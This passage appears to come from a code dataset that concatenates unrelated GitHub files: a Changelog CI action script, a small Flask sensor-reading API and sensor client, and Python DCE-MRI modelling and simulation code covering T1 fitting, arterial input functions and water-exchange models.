matching_pr_labels = []
if not pr_labels:
return ''
for pr_label in pr_labels:
if pr_label in pull_request['labels']:
matching_pr_labels.append(pr_label)
if not matching_pr_labels:
return 'choose PR label: ' + self.config.skip_changelog_label + ', ' + ', '.join(pr_labels)
return ', '.join(matching_pr_labels)
def changelog_generation(self):
"""Get all the merged pull request after the changelog was last generated."""
last_generated_on = self._get_last_generated_on()
if last_generated_on:
merged_date_filter = 'merged:>=' + last_generated_on
else:
# if the changelog hasn't been generated yet then
# take PRs generated in the last 15 minutes - that should get
# the current PR.
min_date = (datetime.utcnow() - timedelta(minutes=15)).strftime('%Y-%m-%dT%H:%M:%SZ')
merged_date_filter = 'merged:>=' + min_date
url = (
'{base_url}/search/issues'
'?q=repo:{repo_name}+'
'is:pr+'
'is:merged+'
'sort:author-date-asc+'
'{merged_date_filter}'
'&sort=merged'
).format(
base_url=self.github_api_url,
repo_name=self.repository,
merged_date_filter=merged_date_filter
)
print_message('URL: {url}'.format(url=url))
items = []
response = requests.get(url, headers=self._get_request_headers)
if response.status_code == 200:
response_data = response.json()
# `total_count` represents the number of
# pull requests returned by the API call
if response_data['total_count'] > 0:
for item in response_data['items']:
data = {
'title': item['title'],
'number': item['number'],
'url': item['html_url'],
'merged_at': item['closed_at'],
'labels': [label['name'] for label in item['labels']]
}
items.append(data)
else:
                msg = (
                    f'There was no pull request '
                    f'made on {self.repository} since the changelog was last generated.'
                )
print_message(msg, message_type='error')
else:
msg = (
f'Could not get pull requests for '
f'{self.repository} from GitHub API. '
f'response status code: {response.status_code}'
)
print_message(msg, message_type='error')
return items
def parse_changelog(self, changes):
return ''.join(
map(self._get_changelog_line, changes)
)
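# Each merged PR contributes a block shaped roughly like the following to the top of
# the changelog (the PR number, URL and label below are made up for illustration):
#
#   ## [#123](https://github.com/owner/repo/pull/123) (2021-06-01)
#   - [feature] Add dark mode toggle
#
# PRs carrying the configured skip_changelog_label are dropped entirely, and PRs with
# none of the configured pr_labels get a "choose PR label: ..." annotation instead.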
class ChangelogCIConfiguration:
"""Configuration class for Changelog PR"""
DEFAULT_PR_LABELS = []
def __init__(self, config_file):
# Initialize with default configuration
self.pr_labels = self.DEFAULT_PR_LABELS
self.skip_changelog_label = None
self.pr_title_removal_regex = None
self.user_raw_config = self.get_user_config(config_file)
self.validate_configuration()
@staticmethod
def get_user_config(config_file):
"""
Read user provided configuration file and
return user configuration
"""
if not config_file:
print_message(
'No Configuration file found, '
'falling back to default configuration to parse changelog',
message_type='warning'
)
return
try:
# parse config files with the extension .yml and .yaml
# using YAML syntax
if config_file.endswith('yml') or config_file.endswith('yaml'):
loader = yaml.safe_load
# parse config files with the extension .json
# using JSON syntax
elif config_file.endswith('json'):
loader = json.load
else:
print_message(
'We only support `JSON` or `YAML` file for configuration '
'falling back to default configuration to parse changelog',
message_type='error'
)
return
with open(config_file, 'r') as file:
config = loader(file)
return config
except Exception as e:
msg = (
f'Invalid Configuration file, error: {e}, '
'falling back to default configuration to parse changelog'
)
print_message(msg, message_type='error')
return
def validate_configuration(self):
"""
Validate all the configuration options and
update configuration attributes
"""
if not self.user_raw_config:
return
if not isinstance(self.user_raw_config, dict):
print_message(
'Configuration does not contain required mapping '
'falling back to default configuration to parse changelog',
message_type='error'
)
return
self.validate_pr_labels()
self.skip_changelog_label = self.user_raw_config.get('skip_changelog_label')
self.pr_title_removal_regex = self.user_raw_config.get('pr_title_removal_regex')
def validate_pr_labels(self):
"""Validate and set pr_labels configuration option"""
pr_labels = self.user_raw_config.get('pr_labels')
if not pr_labels:
msg = '`pr_labels` was not provided'
print_message(msg, message_type='warning')
return
if not isinstance(pr_labels, list):
            msg = '`pr_labels` is not valid, it must be an Array/List.'
print_message(msg, message_type='error')
return
self.pr_labels = pr_labels
def print_message(message, message_type=None):
"""Helper function to print colorful outputs in GitHub Actions shell"""
# https://docs.github.com/en/actions/reference/workflow-commands-for-github-actions
if not message_type:
return subprocess.run(['echo', f'{message}'])
if message_type == 'endgroup':
return subprocess.run(['echo', '::endgroup::'])
return subprocess.run(['echo', f'::{message_type}::{message}'])
if __name__ == '__main__':
# Default environment variable from GitHub
# https://docs.github.com/en/actions/configuring-and-managing-workflows/using-environment-variables
event_path = os.environ['GITHUB_EVENT_PATH']
repository = os.environ['GITHUB_REPOSITORY']
current_branch = os.environ['INPUT_BRANCH']
# User inputs from workflow
filename = os.environ['INPUT_CHANGELOG_FILENAME']
config_file = os.environ['INPUT_CONFIG_FILE']
# Token provided from the workflow
token = os.environ.get('GITHUB_TOKEN')
# Committer username and email address
username = os.environ['INPUT_COMMITTER_USERNAME']
email = os.environ['INPUT_COMMITTER_EMAIL']
# Group: Checkout git repository
print_message('Checkout git repository', message_type='group')
subprocess.run(
[
'git', 'fetch', '--prune', '--unshallow', 'origin',
current_branch
]
)
subprocess.run(['git', 'checkout', current_branch])
print_message('', message_type='endgroup')
# Group: Configure Git
print_message('Configure Git', message_type='group')
subprocess.run(['git', 'config', 'user.name', username])
subprocess.run(['git', 'config', 'user.email', email])
print_message('', message_type='endgroup')
print_message('Parse Configuration', message_type='group')
config = ChangelogCIConfiguration(config_file)
print_message('', message_type='endgroup')
# Group: Generate Changelog
print_message('Generate Changelog', message_type='group')
# Initialize the Changelog PR
ci = ChangelogCIPullRequest(
repository,
event_path,
config,
current_branch,
filename=filename,
token=token
)
# Run Changelog PR
ci.run()
print_message('', message_type='endgroup')
``` |
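For reference, a minimal sketch of a configuration file accepted by the `ChangelogCIConfiguration` class above. The key names are taken from `validate_configuration`/`validate_pr_labels`; the label names, regex, filename, and the assumption that the class definition above is available in the current module are illustrative.
```python
import yaml
# Keys read by ChangelogCIConfiguration above; the values are illustrative assumptions.
sample_config = {
    'pr_labels': ['bug', 'enhancement', 'documentation'],
    'skip_changelog_label': 'skip-changelog',
    'pr_title_removal_regex': r'\[WIP\]\s*',
}
with open('changelog-ci-config.yaml', 'w') as f:
    yaml.safe_dump(sample_config, f)
# Assumes ChangelogCIConfiguration (defined above) is in scope.
config = ChangelogCIConfiguration('changelog-ci-config.yaml')
print(config.pr_labels, config.skip_changelog_label)
```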
{
"source": "JonathanArrance/rackbrain",
"score": 2
} |
#### File: coreservices/backend/backendAPI.py
```python
import os
import sys
import random
import api_lib
import mongo_lib
import APIsettings as settings
from pymongo import MongoClient
from flask import abort, request, jsonify, g, url_for
api = settings.API_VERSION
@mongo_lib.auth.verify_password
def verify_password(username_or_token, password):
# first try to authenticate by token
user = mongo_lib.Account.verify_auth_token(username_or_token)
if not user:
# try to authenticate with username/password
user = mongo_lib.Account.query.filter_by(username=username_or_token).first()
if not user or not user.verify_password(password):
return False
g.user = user
return True
#curl -u backend:rackbrain -i -k -X GET http://192.168.1.56:9443/api/1.0/token
@mongo_lib.app.route('/api/'+api+'/token')
@mongo_lib.auth.login_required
def get_auth_token():
token = g.user.generate_auth_token(3600)
return jsonify({'token': token.decode('ascii'), 'duration': 3600})
@mongo_lib.app.route('/api/'+api+'/alive')
def get_alive():
return jsonify({'data': 'Backend api is alive.'})
#curl -u token:x -i -k -X POST http://192.168.1.56:9443/api/1.0/reading
#-d '{'reading':'34','reading_type':'temp','sensor_serial':'434343434','reading_unit':'kelvin'}'
@mongo_lib.app.route('/api/'+api+'/reading', methods=['POST'])
@mongo_lib.auth.login_required
def add_reading():
    #only the "backend" user can add readings, all others will be rejected
#times should be a unix timestamp since it accounts for date and time
req_data = request.get_json()
params = {'reading_type':req_data['reading_type'],'reading':req_data['reading'],
'sensor_serial':req_data['sensor_serial'],'reading_unit':req_data['reading_unit']
}
return api_lib.add_reading(params)
@mongo_lib.app.route('/api/'+api+'/sensor', methods=['GET'])
@mongo_lib.auth.login_required
def get_sensor():
req_data = request.get_json()
return api_lib.get_sensor(req_data['sensor_serial'])
'''
@mongo_lib.app.route('/api/'+api+'/readings', methods=['GET'])
@mongo_lib.auth.login_required
def get_readings():
#times should be a unix timestamp since it accounts for date and time
start = request.json.get('starttime')
end = request.json.get('endtime')
sensorid = request.json.get('sensorid')
params = {'start':start,'end':end,'sensorid':sensorid}
return api_lib.get_readings(params)
'''
if __name__ == '__main__':
#mongo_lib.app.run(host='0.0.0.0',port=9443, debug=True,ssl_context='adhoc')
mongo_lib.app.run(host='0.0.0.0',port=9443, debug=True)
```
#### File: rackbrain/sensors/sensor_lib.py
```python
import sys
import time
import logging
import requests
import settings
import random
import json
LEVELS = {
'debug': logging.DEBUG,
'info': logging.INFO,
'warning': logging.WARNING,
'error': logging.ERROR,
'critical': logging.CRITICAL
}
def get_backend_token():
"""
Desc: Get the token from the backend API service
Input: None
Output: out_dict - token
- duration - 3600 seconds
Error: 4xx http error
Note:
"""
#get a token from the backend API to send reading data
url = 'http://'+backend_api+'/api/'+settings.API_VERSION+'/token'
r = requests.get(url, auth=requests.auth.HTTPBasicAuth(settings.BACKEND_USER, settings.BACKEND_PASS))
out = r.raise_for_status()
if(out != None):
raise Exception('Could not authenticate DHT 11 to backend API')
return json.loads(r.text)
def send_reading(input_dict):
"""
    Desc: Send a sensor reading to the backend API service
    Input: input_dict - reading - the measured reading from the sensor
           - reading_type - the type of reading - ['temp','humidity','power','pressure'].
- reading_unit - the units the reading is measured in
- sensor_serial - the unique serial number for the sensor
- token - token needed to talk to the backend
Output: 'OK'
Error: 4xx http error
Note:
"""
headers = {"content-type":"application/json;charset=UTF-8","X-Auth-Token":str(input_dict['token'])}
data = "{'reading':'65','reading_type':'temp','sensor_serial':'67676767','reading_unit':'celcious'}"
#get a token from the backend API to send reading data
url = 'http://'+backend_api+'/api/'+settings.API_VERSION+'/reading'
try:
r = requests.post(url,headers=headers, data=data )
out = r.raise_for_status()
if(out != None):
            raise Exception('Could not send DHT 11 reading to backend API')
except Exception as e:
print e
return 'OK'
#return json.loads(r.text)
def get_sensor(serial):
"""
Desc: Get the info for a sensor
    Input: serial - the sensor serial number
    Output: Unique integer serial
Error: ERROR
Note: None
"""
``` |
{
"source": "JonathanArvidsson/DCE-DSC-MRI_CodeCollection",
"score": 2
} |
#### File: original/McGill_Can/vfa.py
```python
import numpy as np
from numpy.linalg import norm
def despot(signal, alpha, TR):
# Ref: <NAME>., <NAME>., & <NAME>. (2005). MRM 53(1), 237–241. https://doi.org/10.1002/mrm.20314
# Based on Matlab code by <NAME>, McGill University
x = signal / np.tan(alpha)
y = signal / np.sin(alpha)
numerator = np.sum(x * y, axis = -1) - np.sum(x, axis = -1) * np.sum(y, axis = -1) / len(alpha)
denominator = np.sum(x * x, axis = -1) - np.sum(x, axis = -1)**2 / len(alpha)
slope = numerator / denominator
intercept = np.mean(y, axis = -1) - slope * np.mean(x, axis = -1)
M0 = intercept / (1 - slope)
T1 = -TR / np.log(slope)
return M0, T1
def novifast(signal, alpha, TR, initialvalues = [5000, 1500], maxiter = 10, tol = 1e-6, doiterative = True):
# Ref: <NAME>., <NAME>., <NAME>., <NAME>., <NAME>.,
# <NAME>., <NAME>., and <NAME>.
# NOVIFAST: a fast algorithm for accurate and precise VFA MRI T1 mapping.
# IEEE Trans. Med. Imag., early access, doi:10.1109/TMI.2018.2833288
spatialdims = signal.shape[:-1]
if not spatialdims: spatialdims = [1]
numvox = np.prod(spatialdims)
numangles = signal.shape[-1]
y = signal.reshape(-1, numangles)
sinfa = np.asmatrix(np.sin(alpha))
sinfa = np.broadcast_to(sinfa,(numvox, numangles))
cosfa = np.asmatrix(np.cos(alpha))
cosfa = np.broadcast_to(cosfa,(numvox, numangles))
initialM0, initialT1 = initialvalues
    # solA and solB correspond to c1 and c2 in the paper
    solA = np.repeat(initialM0 * (1 - np.exp(-TR/initialT1)), numvox)
solB = np.repeat(np.exp(-TR/initialT1), numvox)
k = 0
done = False
while not done:
solB_prev = np.copy(solB)
solA = np.broadcast_to(np.asmatrix(solA).T, (numvox, numangles))
solB = np.broadcast_to(np.asmatrix(solB).T, (numvox, numangles))
# Based on equations 24 to 27 in paper
denominator = 1 - cosfa * solB
Z = y / denominator
A = cosfa * Z
B = sinfa / denominator
Abar = cosfa * B * solA / denominator
# Calculate terms in Eq. 28 of paper
BB = np.sum(B * B, axis = 1)
BA = np.sum(B * A, axis = 1)
BZ = np.sum(B * Z, axis = 1)
AAbar = np.sum(A * Abar, axis = 1)
BAbar = np.sum(B * Abar, axis = 1)
ZAbar = np.sum(Z * Abar, axis = 1)
determinant = BB * AAbar - BAbar * BA
solA = (BZ * AAbar - ZAbar * BA) / determinant
solB = (BB * ZAbar - BAbar * BZ) / determinant
k += 1
if not doiterative:
done = True
else:
err = norm(solB - solB_prev) / norm(solB)
if err < tol or k >= maxiter:
done = True
M0 = solA/(1-solB)
T1 = -TR/np.log(solB)
M0 = M0.reshape(spatialdims)
T1 = T1.reshape(spatialdims)
return M0, T1
```
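A minimal sketch exercising the linear DESPOT fit above on noise-free synthetic SPGR data. The import path mirrors the layout used by the test files later in this collection and, like the sequence and tissue parameter values, is an assumption.
```python
import numpy as np
from src.original.McGill_Can.vfa import despot  # assumed module path
TR = 0.005                                  # repetition time in seconds (illustrative)
alpha = np.deg2rad([2.0, 5.0, 10.0, 15.0])  # flip angles in radians
M0_true, T1_true = 1000.0, 1.2              # illustrative ground truth
# SPGR steady-state signal, the model assumed by both fits above
E1 = np.exp(-TR / T1_true)
signal = M0_true * np.sin(alpha) * (1.0 - E1) / (1.0 - np.cos(alpha) * E1)
M0_est, T1_est = despot(signal, alpha, TR)
print(M0_est, T1_est)  # recovers ~1000 and ~1.2 s on noise-free data
```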
#### File: original/MJT_UoEdinburghUK/aifs.py
```python
from abc import ABC, abstractmethod
import numpy as np
from scipy.interpolate import interp1d
class aif(ABC):
"""Abstract base class for arterial input functions.
Subclasses correspond to types of AIF, e.g. population-average functions
and patient-specific AIFs based on input data.
The main purpose of the aif class is to return the tracer concentration in
arterial plasma at any time points.
Methods
-------
c_ap(t) : get the tracer concentration in arterial plasma at time(s) t (s)
"""
@abstractmethod
def c_ap(self, t):
"""Get the tracer concentration in arterial plasma at arbitrary times.
Parameters
----------
t : ndarray
1D array of floats containing times (s) at which to calculate AIF
concentration.
Returns
-------
c_ap : ndarray
1D array of floats containing tracer concentrations (mM) in AIF
blood plasma at times t.
"""
pass
class patient_specific(aif):
"""Patient-specific AIF subclass.
Constructed using time-concentration data, typically obtained from
experimental measurements. The c_ap method returns AIF
concentration at any requested time points using interpolation.
Attributes
----------
t_data : ndarray
1D float array of time points (s) at which AIF concentration data are
provided
c_ap_data : ndarray
1D float array of concentration data (mM)
c_ap_func : interp1d
interpolation function to generate AIF concentration
"""
def __init__(self, t_data, c_ap_data):
self.t_data = t_data
self.c_ap_data = c_ap_data
self.c_ap_func = interp1d(t_data, c_ap_data,
kind='quadratic', bounds_error=False,
fill_value=(c_ap_data[0], c_ap_data[-1]))
def c_ap(self, t):
"""Get AIF plasma concentration(t). Overrides superclass method."""
# calculate concentration(t) using interpolation function
c_ap = self.c_ap_func(t)
return c_ap
class parker_like(aif):
"""Parker-like AIF subclass.
Generate AIF concentrations using a mathematical function that is based
on the Parker population-average function but with two exponential terms.
Parameters default to the original Parker function.
Attributes
----------
hct : float
Arterial haematocrit
a1, a2, t1, t2, sigma1, sigma2, s, tau, alpha, beta, alpha2, beta2 : float
AIF function parameters
t_start : float
Start time (s). The AIF function is time-shifted by this delay.
"""
def __init__(self, hct, a1=0.809, a2=0.330, t1=0.17046, t2=0.365,
sigma1=0.0563, sigma2=0.132, s=38.078, tau=0.483,
alpha=0, beta=0, alpha2=1.050, beta2=0.1685, t_start=0):
self.a1, self.a2, self.t1, self.t2 = a1, a2, t1, t2
self.sigma1, self.sigma2, self.s, self.tau = sigma1, sigma2, s, tau
self.alpha, self.alpha2 = alpha, alpha2
self.beta, self.beta2 = beta, beta2
self.hct = hct
self.t_start = t_start
def c_ap(self, t):
"""Get AIF plasma concentration(t). Overrides superclass method."""
t_mins = (t - self.t_start) / 60.
# calculate c(t) for arterial blood
c_ab = (self.a1/(self.sigma1*np.sqrt(2.*np.pi))) * \
np.exp(-((t_mins-self.t1)**2)/(2.*self.sigma1**2)) + \
(self.a2/(self.sigma2*np.sqrt(2.*np.pi))) * \
np.exp(-((t_mins-self.t2)**2)/(2.*self.sigma2**2)) + \
(self.alpha*np.exp(-self.beta*t_mins) +
self.alpha2*np.exp(-self.beta2*t_mins)) / \
(1+np.exp(-self.s*(t_mins-self.tau)))
c_ap = c_ab / (1 - self.hct)
c_ap[t < self.t_start] = 0.
return c_ap
class parker(parker_like):
"""Parker AIF (subclass of parker_like).
Generate AIF concentrations using Parker population-average function.
Attributes
----------
hct : float
Arterial haematocrit
a1, a2, t1, t2, sigma1, sigma2, s, tau, alpha, beta, alpha2, beta2 : float
AIF function parameters
t_start : float
Start time (s). The AIF function is time-shifted by this delay.
"""
def __init__(self, hct, t_start=0):
super().__init__(hct, t_start=t_start)
```
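A short usage sketch for the population-average AIF defined above; the import path mirrors the test modules in this collection, and the haematocrit, bolus-arrival time, and sampling grid are illustrative assumptions.
```python
import numpy as np
from src.original.MJT_UoEdinburghUK.aifs import parker  # assumed module path
t = np.arange(0.0, 300.0, 1.0)        # sampling times in seconds
aif = parker(hct=0.42, t_start=30.0)  # 42% haematocrit, bolus arrives at 30 s
c_ap = aif.c_ap(t)                    # arterial plasma concentration (mM)
print(float(c_ap.max()))              # peak concentration of the first-pass bolus
```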
#### File: original/MJT_UoEdinburghUK/water_ex_models.py
```python
from abc import ABC, abstractmethod
class water_ex_model(ABC):
"""Abstract base class for water exchange models.
Subclasses correspond to specific models (e.g. fast-exchange limit). The
main purpose of these classes is to estimate the exponential T1 relaxation
components for the tissue, dependent on the T1 relaxation rates in each
tissue compartment (blood, EES and intracellular). For example,
in the fast-exchange limit model, the result is a single T1 component,
while in the slow exchange limit, the result is 3 T1 components.
Methods
-------
R1_components(p, R1):
get the R1 relaxation rates and corresponding population fractions for
each exponential T1 component
"""
@abstractmethod
def R1_components(self, p, R1):
"""Get exponential T1 components.
Parameters
----------
p : dict
Spin population fraction for each tissue compartment.
Example: p = {'b': 0.1, 'e': 0.4, 'i': 0.5}
R1 : dict
R1 relaxation rate (s^-1) for each tissue compartment.
Example: R1 = {'b': 0.6, 'e': 1.0, 'i': 1.0}
Returns
-------
R1 components : list
List of floats, corresponding to the R1 of each exponential
relaxation component. The number of items depends on the water
exchange model.
p_components: list
List of floats, corresponding to the spin population fractions of
each exponential relaxation component.
"""
pass
class fxl(water_ex_model):
"""Fast water exchange model.
Water exchange between all compartments is in the fast limit.
"""
def R1_components(self, p, R1):
"""Get R1 components for this model. Overrides superclass method."""
R1 = p['b']*R1['b'] + p['e']*R1['e'] + p['i']*R1['i']
R1_components = [R1]
p_components = [1.]
return R1_components, p_components
class nxl(water_ex_model):
"""No-exchange limit water exchange model.
Water exchange between all compartments is in the slow limit.
"""
def R1_components(self, p, R1):
"""Get R1 components for this model. Overrides superclass method."""
R1_components = [R1['b'], R1['e'], R1['i']]
p_components = [p['b'], p['e'], p['i']]
return R1_components, p_components
class ntexl(water_ex_model):
"""No-transendothelial water exchange limit model.
Water exchange between blood and EES compartments is in the slow limit.
The EES and intracellular compartments are in the fast-exchange limit and
behave as a single compartment.
"""
def R1_components(self, p, R1):
"""Get R1 components for this model. Overrides superclass method."""
p_ev = p['e'] + p['i']
R1_ev = (p['e']*R1['e'] + p['i']*R1['i']) / p_ev
R1_components = [R1['b'], R1_ev]
p_components = [p['b'], p_ev]
return R1_components, p_components
```
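The three exchange regimes above can be compared directly using the example values from the docstrings; the import path is an assumption mirroring the test modules in this collection.
```python
from src.original.MJT_UoEdinburghUK.water_ex_models import fxl, ntexl, nxl  # assumed path
p = {'b': 0.1, 'e': 0.4, 'i': 0.5}    # spin population fractions (docstring example)
R1 = {'b': 0.6, 'e': 1.0, 'i': 1.0}   # compartment R1 values in s^-1
print(fxl().R1_components(p, R1))     # one component:  ([0.96], [1.0])
print(ntexl().R1_components(p, R1))   # two components: ([0.6, 1.0], [0.1, 0.9])
print(nxl().R1_components(p, R1))     # three components, one per compartment
```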
#### File: OGJ_OsloU_Norway/MRImageAnalysis/math.py
```python
from . import io
import numpy as np
class NP:
'''
Class with modified numpy functions to make code more dense
'''
@staticmethod
def convolve(x, y, t):
return (np.convolve(x, y)*(t[1]-t[0]))[:len(t)]
class Integration:
@staticmethod
def cumulativeIntegral(x, y, method='trapezoidal'):
return getattr(Integration, 'cumulative' + method.capitalize())(x, y)
@staticmethod
def cumulativeTrapezoidal(x, y):
ret = np.zeros(len(x))
ret[1:] = np.cumsum(0.5*(y[:-1] + y[1:])*(x[1:] - x[:-1]))
return ret
class misc:
@staticmethod
def downSample(signal, old_time, new_time):
'''
Function to downsample a signal with timepoints
old_time, into a new signal with timepoints new_time
'''
# if new_time[-1] > old_time[-1] or new_time[0] < old_time[0]:
# io.printWarning('New time must be a subset of old time.')
# return signal
new_signal = np.zeros(len(new_time))
for i in range(len(new_time)):
time_diff = old_time - new_time[i]
j = np.argmin(abs(time_diff))
if time_diff[j] < 0:
j1 = j-1
j2 = j
else:
j1 = j
j2 = j+1
if j2 >= len(old_time):
new_signal[i] = signal[-1]
continue
a = (signal[j2] - signal[j1])/(old_time[j2] - old_time[j1])
b = -a*old_time[j1] + signal[j1]
new_signal[i] = a*new_time[i] + b
return new_signal
def downSampleAverage(old_t, old_signal, dt):
'''
		Downsamples a signal by first creating a new time array
		with resolution dt, then looping through the indices
of the new array and for each time point, calculating the
average of old_signal from new_t[i]-dt/2 to new_t[i]+dt/2.
The averaging is upward inclusive and downward exclusive.
'''
if old_t[1]-old_t[0] == dt or dt == 0:
return old_t, old_signal
new_t = np.arange(0, old_t[-1]*1.001, dt) # times by 1.001 to just include the upper bound
new_signal = np.zeros(len(new_t))
first_idx = np.argmin(abs(old_t - dt/2))+1
new_signal[0] = np.average(old_signal[:first_idx])
for i in range(1,len(new_t)):
mid_idx = np.argmin(abs(old_t - i*dt))
lower_idx = np.argmin(abs(old_t - (old_t[mid_idx]-dt/2)))+1
upper_idx = np.argmin(abs(old_t - (old_t[mid_idx]+dt/2)))+1
new_signal[i] = np.average(old_signal[lower_idx:upper_idx])
new_signal[0] = 0
return new_t, new_signal
```
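A small sanity-check sketch for the cumulative trapezoidal integral above; the package import is an assumption about how `MRImageAnalysis` is installed.
```python
import numpy as np
from MRImageAnalysis.math import Integration  # assumed package layout
x = np.linspace(0.0, 1.0, 101)
y = 2.0 * x                          # integrand 2x, so the running integral is ~x**2
area = Integration.cumulativeIntegral(x, y, method='trapezoidal')
print(area[-1])                      # ~1.0 over the full interval
```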
#### File: Simulations/bat/optimal_BAT_and_range.py
```python
import sys, os
import MRImageAnalysis as mri
import matplotlib.pyplot as plt
import numpy as np
savePath = '../results/bat/parameter_estimates/'
K_transs = np.linspace(0.04, 0.14, 50)
v_p = 0.02
v_e = 0.2
F_ps = [0.2, 0.4, 0.8]
def f(t, i):
'''
i is how many dts to move right
'''
ret = np.zeros(len(t))
ret[i] = 1
return ret
t0, C_a0 = mri.DCE.AIF.loadStandard()
dt = t0[1]-t0[0]
# remove the baseline in the AIF
c = 0
for i in (C_a0>0)*1:
if i == 1:
first = c
break
c += 1
original_BAT = t0[c]
C_a = np.zeros(len(C_a0))
C_a[:-c] = C_a0[c:]
C_a[-c:] = C_a0[-1]
BATs = np.arange(original_BAT-4, original_BAT+4, 0.1)
C_a_new = np.zeros((len(BATs), len(C_a)))
for i in range(len(BATs)):
C_a_new[i] = np.convolve(C_a, f(t0, int(BATs[i]/dt)))[:len(t0)]
Ktrans_values = np.zeros((len(BATs), len(K_transs), len(F_ps)))
ve_values = np.zeros((len(BATs), len(K_transs), len(F_ps)))
vp_values = np.zeros((len(BATs), len(K_transs), len(F_ps)))
Fp_values = np.zeros((len(BATs), len(K_transs), len(F_ps)))
dBAT = BATs - original_BAT
t0 /= 60 # time in minutes
pbar = mri.io.ProgressBar('', maxval=len(K_transs)*len(F_ps))
for i in range(len(K_transs)):
for j in range(len(F_ps)):
# create a signal with appropriate values
S0 = mri.DCE.Models.twoCXM(t0, C_a0, K_trans=K_transs[i], v_p=v_p, v_e=v_e, F_p=F_ps[j])
# now downsample the signal so that we get a better dt
dt = 2/60.
t, S = mri.math.misc.downSampleAverage(t0, S0, dt)
# compute the model fit using different AIFs with different BATs
for k in range(len(BATs)):
_, C_a = mri.math.misc.downSampleAverage(t0, C_a_new[k], dt)
fit = mri.DCE.Analyze.fitToModel('2CXM', S, t, C_a, showPbar=False)
if fit.v_p < 0 or fit.v_e < 0 or fit.v_p > 100 or fit.v_e > 100 or fit.v_e+fit.v_p>100:
_K_trans = np.inf
_v_e = np.inf
_v_p = np.inf
_F_p = np.inf
elif fit.K_trans > fit.F_p or fit.K_trans < 0 or fit.F_p < 0:
_K_trans = np.inf
_v_e = np.inf
_v_p = np.inf
_F_p = np.inf
else:
_K_trans = fit.K_trans
_v_e = fit.v_e
_v_p = fit.v_p
_F_p = fit.F_p
Ktrans_values[k, i, j] = _K_trans
ve_values[k, i, j] = _v_e
vp_values[k, i, j] = _v_p
Fp_values[k, i, j] = _F_p
pbar.update()
pbar.finish()
for p in ['K_trans', 'v_e', 'v_p', 'F_p']:
for j in range(len(F_ps)):
save = np.zeros((len(BATs), len(K_transs)))
for i in range(len(K_transs)):
if p == 'K_trans':
save[:,i] = Ktrans_values[:,i,j]*100
if p == 'v_e':
save[:,i] = ve_values[:,i,j]*100
if p == 'v_p':
save[:,i] = vp_values[:,i,j]*100
if p == 'F_p':
save[:,i] = Fp_values[:,i,j]*100
header = 'The rows are values at different changes in bolus arrival times (BAT) ranging from {} to {} with N={} values'.format(dBAT[0], dBAT[-1], len(dBAT))
header += '\nThen the columns are estimated {} for different values of K_trans. The first column is for K_trans={}, the second for K_trans={},'.format(p, K_transs[0]*100, K_transs[1]*100)
        header += '\nand so on until K_trans={}. Total number of K_trans values is N={}.'.format(K_transs[-1]*100, len(K_transs))
header += '\nTrue values: v_p={} ml/100g, v_e={} ml/100g.'.format(v_p*100, v_e*100)
np.savetxt(savePath+'{}_estimate_Fp={}.txt'.format(p, int(F_ps[j]*100)), save, header=header)
sys.exit()
```
#### File: Simulations/bat/run.py
```python
import sys, os
import MRImageAnalysis as mri
import matplotlib.pyplot as plt
import numpy as np
savePath = '../results/bat/'
K_trans = 0.07
v_p = 0.02
v_e = 0.2
F_ps = [0.2, 0.4, 0.8]
def f(t, i):
'''
i is how many dts to move right
'''
ret = np.zeros(len(t))
ret[i] = 1
return ret
t0, C_a0 = mri.DCE.AIF.loadStandard()
dt = t0[1]-t0[0]
# remove the baseline in the AIF
c = 0
for i in (C_a0>0)*1:
if i == 1:
first = c
break
c += 1
original_BAT = t0[c]
C_a = np.zeros(len(C_a0))
C_a[:-c] = C_a0[c:]
C_a[-c:] = C_a0[-1]
BATs = np.arange(original_BAT-4, original_BAT+4, 0.1)
C_a_new = np.zeros((len(BATs), len(C_a)))
for i in range(len(BATs)):
C_a_new[i] = np.convolve(C_a, f(t0, int(BATs[i]/dt)))[:len(t0)]
TM_values = np.zeros((len(BATs), 1+2*len(F_ps)))
ETM_values = np.zeros((len(BATs), 1+3*len(F_ps)))
twoCXM_values = np.zeros((len(BATs), 1+4*len(F_ps)))
TM_values[:,0] = BATs - original_BAT
ETM_values[:,0] = BATs - original_BAT
twoCXM_values[:,0] = BATs - original_BAT
t0 /= 60 # time in minutes
for i in range(len(F_ps)):
# create a signal with appropriate values
S0 = mri.DCE.Models.twoCXM(t0, C_a0, K_trans=K_trans, v_p=v_p, v_e=v_e, F_p=F_ps[i])
# now downsample the signal so that we get a better dt
dt = 2/60.
t, S = mri.math.misc.downSampleAverage(t0, S0, dt)
# compute the model fit using different AIFs with different BATs
for j in range(len(BATs)):
_, C_a = mri.math.misc.downSampleAverage(t0, C_a_new[j], dt)
for model in ['TM', 'ETM', '2CXM']:
fit = mri.DCE.Analyze.fitToModel(model, S, t, C_a, showPbar=False)
if model == 'TM':
TM_values[j, i*2+1] = fit.K_trans
TM_values[j, i*2+2] = fit.v_e
if model == 'ETM':
ETM_values[j, i*3+1] = fit.K_trans
ETM_values[j, i*3+2] = fit.v_e
ETM_values[j, i*3+3] = fit.v_p
if model == '2CXM':
twoCXM_values[j, i*4+1] = fit.K_trans
twoCXM_values[j, i*4+2] = fit.v_e
twoCXM_values[j, i*4+3] = fit.v_p
twoCXM_values[j, i*4+4] = fit.F_p
header = 'True values are: K_trans = {}, v_e = {}, v_p = {}.'.format(K_trans, v_e, v_p)
header += '\nThe columns are (bat=bolus arrival time):'
header += '\nChange in bat (s)'
header_TM = header
header_ETM = header
header_2CXM = header
for F_p in F_ps:
header_TM += ', K_trans(F_p = {}), v_e(F_p = {})'.format(F_p, F_p)
header_ETM += ', K_trans(F_p = {}), v_e(F_p = {}), v_p(F_p = {})'.format(F_p, F_p, F_p)
header_2CXM += ', K_trans(F_p = {}), v_e(F_p = {}), v_p(F_p = {}), F_p(F_p = {})'.format(F_p, F_p, F_p, F_p)
np.savetxt(savePath+'TM_values.txt', TM_values, header=header_TM)
np.savetxt(savePath+'ETM_values.txt', ETM_values, header=header_ETM)
np.savetxt(savePath+'2CXM_values.txt', twoCXM_values, header=header_2CXM)
```
#### File: Simulations/transfer_functions/imports.py
```python
import MRImageAnalysis as mri
import matplotlib.pyplot as plt
import numpy as np
import sys
class TransferFunctions:
def __init__(self, w, K_trans, v_e, v_p=None, F_p=None, PS=None):
self.w = w
self.defaults = {
'K_trans': K_trans,
'F_p' : F_p,
'v_p' : v_p,
'v_e' : v_e,
'PS' : PS
}
self.reset()
@property
def k_ep(self):
return self.K_trans/self.v_e
def reset(self):
for p in self.defaults:
setattr(self, p, self.defaults[p])
def dB(self, y):
return 20*np.log10(np.abs(y))
def H_2CXM(self, cutoff=False):
if self.PS is None:
